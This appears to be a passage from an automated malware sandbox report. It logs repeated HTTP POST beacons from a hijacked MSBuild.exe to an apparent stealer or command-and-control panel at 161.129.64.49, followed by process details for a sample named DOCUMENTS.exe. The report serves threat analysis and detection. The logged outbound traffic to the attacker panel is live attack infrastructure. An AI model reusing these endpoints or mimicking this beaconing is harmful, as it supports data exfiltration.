                                          Sep 15, 2021 14:13:33.097158909 CEST1157OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:33.122642040 CEST1158INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:34.460009098 CEST1159INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:33 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:34.751784086 CEST1160OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:34.776943922 CEST1160INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:36.123543024 CEST1160INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:34 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:36.422976017 CEST1169OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:36.449357986 CEST1170INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:37.804518938 CEST1208INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:36 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:38.109925032 CEST1209OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:38.135873079 CEST1209INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:39.476407051 CEST2658INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:38 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:39.807173014 CEST3851OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:39.832612991 CEST3851INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:40.975805998 CEST4879INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:39 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:41.525769949 CEST4880OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:41.550904036 CEST4880INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:42.923151970 CEST4881INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:41 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:43.286066055 CEST4881OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:43.312797070 CEST4881INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:44.491574049 CEST4884INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:43 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:45.072092056 CEST4884OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:45.097580910 CEST4884INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:46.437989950 CEST4885INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:45 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:46.819101095 CEST4885OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:46.848864079 CEST4886INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:47.995552063 CEST4888INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:46 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:48.662318945 CEST4888OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:48.687911987 CEST4888INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:50.046020031 CEST4889INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:48 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:50.457855940 CEST4890OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:50.483243942 CEST4890INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:51.604737043 CEST4892INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:50 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:52.353688955 CEST4893OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 458
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:52.380866051 CEST4893INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:53.744338989 CEST4893INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:52 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:54.176737070 CEST4894OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:54.204462051 CEST4894INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:55.384918928 CEST4896INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:54 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:56.112840891 CEST4897OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:56.138398886 CEST4897INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:57.478768110 CEST4898INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:56 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:57.956692934 CEST4898OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 458
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:57.983563900 CEST4898INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:59.137239933 CEST4900INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:57 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:14:00.370670080 CEST4901OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:00.395814896 CEST4901INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:14:01.768973112 CEST4902INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:14:00 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:14:02.661793947 CEST4902OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:02.687347889 CEST4902INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:14:03.835738897 CEST4904INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:14:02 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:14:05.112627029 CEST4905OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 458
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:05.138648033 CEST4905INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:14:06.472397089 CEST4906INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:14:05 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:14:07.456280947 CEST4906OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:07.482511997 CEST4906INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:14:08.650330067 CEST4909INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:14:07 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:14:09.976701975 CEST4910OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:10.001939058 CEST4910INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:14:11.360577106 CEST4911INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:14:10 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:14:12.349174976 CEST4911OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 460
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:12.374934912 CEST4911INHTTP/1.1 100 Continue


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.549755161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:23.444530010 CEST1106OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:23.469619036 CEST1108INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:24.806164980 CEST1122INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:23 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:24.816778898 CEST1123OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:24.842765093 CEST1124INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:25.972719908 CEST1134INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:24 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:26.351392984 CEST1135OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:26.376863956 CEST1136INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:27.754045963 CEST1143INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:26 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:27.979247093 CEST1144OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:28.004095078 CEST1145INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:29.348956108 CEST1153INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:28 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:29.846992016 CEST1153OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:29.872878075 CEST1153INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:31.219254971 CEST1155INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:29 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:31.454013109 CEST1156OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:31.479247093 CEST1156INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:32.833340883 CEST1157INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:31 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:33.099281073 CEST1157OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:33.124250889 CEST1158INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:34.257390022 CEST1159INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:33 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.549773161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:36.452723980 CEST1171OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:36.480820894 CEST1175INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:37.631304026 CEST1208INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:36 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.549779161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:39.834562063 CEST3852OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:39.860543013 CEST3852INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:41.231333971 CEST4880INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:39 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.549782161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:43.357093096 CEST4883OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:43.382200956 CEST4883INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:44.726938963 CEST4884INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:43 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          7192.168.2.549783161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:46.905596018 CEST4887OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:46.931204081 CEST4887INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:48.267934084 CEST4888INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:46 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          8192.168.2.549784161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:50.561420918 CEST4891OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:50.588109970 CEST4891INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:51.928198099 CEST4892INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:50 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          9192.168.2.549785161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:54.329246998 CEST4895OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:54.354396105 CEST4895INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:55.689045906 CEST4896INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:54 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:14:12:36
                                          Start date:15/09/2021
                                          Path:C:\Users\user\Desktop\DOCUMENTS.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\DOCUMENTS.exe'
                                          Imagebase:0xe30000
                                          File size:713728 bytes
                                          MD5 hash:F93324854461139C58E0E865CEB3C859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
